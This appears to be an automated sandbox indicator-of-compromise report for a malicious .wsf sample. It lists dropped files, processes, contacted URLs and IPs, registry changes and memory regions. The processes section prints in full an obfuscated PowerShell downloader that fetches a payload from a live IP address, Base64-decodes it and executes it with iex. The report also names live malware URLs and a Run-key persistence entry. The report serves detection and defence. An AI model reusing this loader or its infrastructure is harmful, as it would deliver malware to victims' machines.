IOC Report
CDS AC 661171855-VN1 SOA.wsf

loading gif

Files

File Path
Type
Category
Malicious
CDS AC 661171855-VN1 SOA.wsf
XML 1.0 document, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\424iy8O9X8
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35uudlsa.c4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehedxga5.unh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpz1ed51.d51.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ue42xeym.f33.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Thermoswitch172.Med
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
malicious
C:\Windows\SysWOW64\recover.exe
"C:\Windows\SysWOW64\recover.exe"
malicious
C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe
"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://87.121.105.163/AKaUDBTG140.binb
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://87.121.105.163/domkapitler.msi
87.121.105.163
http://87.121.105.163/domkapitler.msiP
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://www.jackcliu.com/u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX
45.194.181.142
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://www.ecosia.org/newtab/
unknown
http://www.smartfindsdepot.shop/u88q/
23.82.11.73
https://github.com/Pester/Pester
unknown
http://87.121.105.163/domkapitler.msiXR
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://87.121.105.163//
unknown
http://87.121.105.163/AKaUDBTG140.bin
87.121.105.163
http://87.121.105.163/AKaUDBTG140.bin~OU
unknown
https://aka.ms/pscore6lB
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://87.121.105.163/AKaUDBTG140.bin/
unknown
https://aka.ms/pscore68
unknown
http://www.smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g=
23.82.11.73
http://crl.microv
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.H
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://www.smartfindsdepot.shop
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.barpa.be
unknown
malicious
www.smartfindsdepot.shop
23.82.11.73
barpa.be
192.185.96.244
www.jackcliu.com
45.194.181.142

IPs

IP
Domain
Country
Malicious
45.194.181.142
www.jackcliu.com
Seychelles
192.185.96.244
barpa.be
United States
87.121.105.163
unknown
Bulgaria
23.82.11.73
www.smartfindsdepot.shop
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
T61TH2R0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2432CDEC000
trusted library allocation
page read and write
malicious
BD0000
system
page execute and read and write
malicious
580F000
trusted library allocation
page read and write
malicious
3210000
trusted library allocation
page read and write
malicious
2CF0000
system
page execute and read and write
malicious
31D0000
trusted library allocation
page read and write
malicious
214C0000
unclassified section
page execute and read and write
malicious
9FC7000
direct allocation
page execute and read and write
malicious
3B80000
unkown
page execute and read and write
malicious
8600000
direct allocation
page execute and read and write
malicious
56E4000
trusted library allocation
page read and write
7C16000
heap
page read and write
5681000
trusted library allocation
page read and write
2431CFA4000
trusted library allocation
page read and write
71E0000
heap
page execute and read and write
7BEA000
heap
page read and write
30D1000
heap
page read and write
2431B2FC000
heap
page read and write
3000000
remote allocation
page execute and read and write
190000
unkown
page readonly
30D1000
heap
page read and write
3400000
heap
page read and write
16B0000
unkown
page readonly
30D1000
heap
page read and write
19E000
unkown
page readonly
1B70FFD9000
heap
page read and write
30D1000
heap
page read and write
243354FD000
heap
page read and write
59A000
stack
page read and write
1B710042000
heap
page read and write
1B710011000
heap
page read and write
3390000
trusted library allocation
page read and write
30D1000
heap
page read and write
4345000
heap
page read and write
7FFD34850000
trusted library allocation
page execute and read and write
7FFD349E0000
trusted library allocation
page read and write
75CB000
stack
page read and write
4364000
heap
page read and write
1B710028000
heap
page read and write
74E0000
trusted library allocation
page read and write
1B70E355000
heap
page read and write
191000
unkown
page execute read
8390000
heap
page read and write
71D5000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
2431B2C5000
heap
page read and write
7520000
trusted library allocation
page read and write
2470000
unkown
page read and write
2D9E000
stack
page read and write
1B70E283000
heap
page read and write
24335360000
heap
page read and write
46E15FE000
stack
page read and write
BB0000
unkown
page readonly
1FD70000
direct allocation
page execute and read and write
30D1000
heap
page read and write
1A7000
unkown
page readonly
46E16FE000
stack
page read and write
20ADD6C0000
heap
page read and write
426E000
stack
page read and write
7C9A000
heap
page read and write
30D1000
heap
page read and write
2DB9000
heap
page read and write
1B70E1B8000
heap
page read and write
1F2E0000
direct allocation
page read and write
268F000
stack
page read and write
64C000
stack
page read and write
30D1000
heap
page read and write
6C5E000
stack
page read and write
1B710011000
heap
page read and write
30D1000
heap
page read and write
74E000
stack
page read and write
524E000
stack
page read and write
1B71001A000
heap
page read and write
30D1000
heap
page read and write
7FFD34AB0000
trusted library allocation
page read and write
1F2F0000
direct allocation
page read and write
1B70E264000
heap
page read and write
2DBE000
stack
page read and write
7C4F000
heap
page read and write
30D1000
heap
page read and write
24C0000
heap
page read and write
3440000
direct allocation
page execute and read and write
2431CC50000
trusted library allocation
page read and write
1B70E23C000
heap
page read and write
528F000
stack
page read and write
2431EDC4000
trusted library allocation
page read and write
30D1000
heap
page read and write
27105B00000
trusted library allocation
page read and write
8377000
heap
page read and write
30D1000
heap
page read and write
2431CC80000
trusted library allocation
page read and write
7FFD347AB000
trusted library allocation
page read and write
1F6D70E4000
heap
page read and write
30D1000
heap
page read and write
2433530F000
heap
page read and write
749D000
stack
page read and write
2D44000
heap
page read and write
31BF000
stack
page read and write
30D1000
heap
page read and write
1F88F000
stack
page read and write
30D1000
heap
page read and write
1B710051000
heap
page read and write
35DE000
direct allocation
page execute and read and write
243354D8000
heap
page read and write
1B710035000
heap
page read and write
1B70FFD9000
heap
page read and write
1FE9D000
direct allocation
page execute and read and write
2432D075000
trusted library allocation
page read and write
7FFD3484C000
trusted library allocation
page execute and read and write
30D1000
heap
page read and write
2E42000
unkown
page read and write
1A5000
unkown
page read and write
30D1000
heap
page read and write
2E84000
heap
page read and write
1B70E357000
heap
page read and write
328C000
heap
page read and write
2DEA000
heap
page read and write
30D1000
heap
page read and write
1B70E282000
heap
page read and write
1B70E35E000
heap
page read and write
7530000
trusted library allocation
page read and write
30D1000
heap
page read and write
1B710089000
heap
page read and write
1228000
heap
page read and write
30D1000
heap
page read and write
1B70E35E000
heap
page read and write
C49000
stack
page read and write
7500000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
46E264D000
stack
page read and write
4E3D000
stack
page read and write
271040F0000
heap
page read and write
CD0000
unkown
page readonly
2431D3A1000
trusted library allocation
page read and write
1061000
unkown
page readonly
2432CD90000
trusted library allocation
page read and write
305C000
unkown
page read and write
30D1000
heap
page read and write
2DDE000
stack
page read and write
1B710099000
heap
page read and write
A60000
unkown
page readonly
8610000
trusted library allocation
page read and write
8186000
heap
page read and write
29D0000
trusted library allocation
page read and write
3F8C000
system
page read and write
2FEDDFE000
stack
page read and write
7FFD34A70000
trusted library allocation
page read and write
1B7100B8000
heap
page read and write
30D1000
heap
page read and write
1B70E260000
heap
page read and write
74F0000
trusted library allocation
page read and write
8680000
direct allocation
page read and write
2D44000
heap
page read and write
A60000
unkown
page readonly
1F6D6D80000
heap
page read and write
30D1000
heap
page read and write
315E000
unkown
page read and write
1B70E1B0000
heap
page read and write
271058C0000
heap
page read and write
27105C0F000
trusted library allocation
page read and write
11B0000
unkown
page read and write
124E000
heap
page read and write
2431EDDF000
trusted library allocation
page read and write
24335240000
heap
page execute and read and write
7C3B000
heap
page read and write
7FFD34AE0000
trusted library allocation
page read and write
4A8E000
stack
page read and write
2431B3B0000
heap
page read and write
271040DA000
heap
page read and write
2DF4000
heap
page read and write
7C4D000
heap
page read and write
56A9000
trusted library allocation
page read and write
1B710054000
heap
page read and write
900000
heap
page read and write
30D1000
heap
page read and write
1B71002D000
heap
page read and write
1B710035000
heap
page read and write
2C25000
trusted library allocation
page execute and read and write
7FFD34792000
trusted library allocation
page read and write
28E7000
heap
page read and write
A1E000
stack
page read and write
6B3E000
stack
page read and write
8367000
heap
page read and write
8375000
heap
page read and write
1B70E272000
heap
page read and write
30D1000
heap
page read and write
24335550000
heap
page read and write
1B710089000
heap
page read and write
1B710079000
heap
page read and write
7F70000
trusted library allocation
page execute and read and write
1B71008E000
heap
page read and write
B00000
unkown
page readonly
1B70E239000
heap
page read and write
1011000
unkown
page readonly
3097000
remote allocation
page execute and read and write
2431B4A0000
heap
page read and write
7BD9000
heap
page read and write
30D1000
heap
page read and write
1B70E223000
heap
page read and write
307E000
stack
page read and write
7E00000
heap
page read and write
1B70FF56000
heap
page read and write
271040B0000
heap
page read and write
5F0000
unkown
page readonly
86E0000
direct allocation
page read and write
85D0000
trusted library allocation
page read and write
1B70FF63000
heap
page read and write
8690000
direct allocation
page read and write
27105C0C000
trusted library allocation
page read and write
1B710059000
heap
page read and write
2431EE54000
trusted library allocation
page read and write
42F0000
heap
page read and write
B7A000
stack
page read and write
A20000
unkown
page read and write
2432CD81000
trusted library allocation
page read and write
218D8000
unclassified section
page execute and read and write
30D1000
heap
page read and write
1F74E000
stack
page read and write
B7F000
stack
page read and write
8670000
trusted library allocation
page execute and read and write
7C7B000
heap
page read and write
5D0000
unkown
page readonly
7FFD34950000
trusted library allocation
page execute and read and write
2DE0000
heap
page read and write
30D1000
heap
page read and write
3231000
heap
page read and write
11A0000
unkown
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1B710074000
heap
page read and write
1B710069000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1B710064000
heap
page read and write
7FFD34AF0000
trusted library allocation
page read and write
11F0000
heap
page read and write
520000
unkown
page readonly
4681000
trusted library allocation
page read and write
6DFD000
stack
page read and write
30D1000
heap
page read and write
80D8000
trusted library allocation
page read and write
2690000
unkown
page readonly
2431EC0E000
trusted library allocation
page read and write
3711000
direct allocation
page execute and read and write
1B71006C000
heap
page read and write
2FEE000
stack
page read and write
1B70E22F000
heap
page read and write
7560000
trusted library allocation
page read and write
3E72000
system
page read and write
3070000
trusted library allocation
page read and write
7C80000
heap
page read and write
1B7103A0000
heap
page read and write
1F2D0000
direct allocation
page read and write
7FFD34990000
trusted library allocation
page read and write
111C000
system
page execute and read and write
BC0000
unkown
page readonly
4DEE000
stack
page read and write
30D1000
heap
page read and write
2C40000
trusted library allocation
page read and write
8700000
direct allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
191000
unkown
page execute read
1B710084000
heap
page read and write
1138000
system
page execute and read and write
1B70E28E000
heap
page read and write
2CB8000
stack
page read and write
24335535000
heap
page read and write
30D1000
heap
page read and write
1B710047000
heap
page read and write
46E167E000
stack
page read and write
30D1000
heap
page read and write
1B70E223000
heap
page read and write
7FFD3479D000
trusted library allocation
page execute and read and write
1B70E232000
heap
page read and write
C4137FE000
stack
page read and write
A31000
unkown
page readonly
30D1000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2431CCF0000
heap
page read and write
24335250000
heap
page read and write
2DD0000
heap
page readonly
1B70FF55000
heap
page read and write
30D1000
heap
page read and write
1B70E263000
heap
page read and write
848C000
stack
page read and write
2DE0000
direct allocation
page read and write
710F000
heap
page read and write
30D1000
heap
page read and write
2FEDCF9000
stack
page read and write
30D1000
heap
page read and write
524C000
stack
page read and write
190000
unkown
page readonly
30D1000
heap
page read and write
30D1000
heap
page read and write
2431B460000
heap
page readonly
7FFD34A20000
trusted library allocation
page read and write
30D1000
heap
page read and write
20ADD2A0000
heap
page read and write
2431D73E000
trusted library allocation
page read and write
BD8000
heap
page read and write
465E000
stack
page read and write
31A0000
heap
page read and write
305C000
unkown
page read and write
741E000
stack
page read and write
3A6C000
unclassified section
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
46E11DF000
stack
page read and write
30D1000
heap
page read and write
1B70E35C000
heap
page read and write
1FBC1000
heap
page read and write
B90000
direct allocation
page read and write
30D1000
heap
page read and write
1B710030000
heap
page read and write
30D1000
heap
page read and write
850E000
stack
page read and write
1B710050000
heap
page read and write
4DBB000
stack
page read and write
2CF0000
trusted library allocation
page read and write
4ACF000
stack
page read and write
419AFD000
stack
page read and write
2D30000
heap
page read and write
2431CE02000
trusted library allocation
page read and write
1B70E21C000
heap
page read and write
1B71039E000
heap
page read and write
1B70FF6B000
heap
page read and write
414C000
system
page read and write
1B710035000
heap
page read and write
1FCEA000
heap
page read and write
4D0C000
stack
page read and write
1B70FF6B000
heap
page read and write
30D1000
heap
page read and write
7BC0000
heap
page read and write
25A52FF000
stack
page read and write
2431B33A000
heap
page read and write
1B70E110000
heap
page read and write
2DEE000
heap
page read and write
900000
heap
page read and write
19E000
unkown
page readonly
46E119E000
stack
page read and write
7FFD000
stack
page read and write
30D1000
heap
page read and write
2431E15B000
trusted library allocation
page read and write
1F7CB000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
3070000
heap
page read and write
30D1000
heap
page read and write
1B70E29F000
heap
page read and write
3125000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
818C000
stack
page read and write
2CCF000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
7C3D000
heap
page read and write
118F000
system
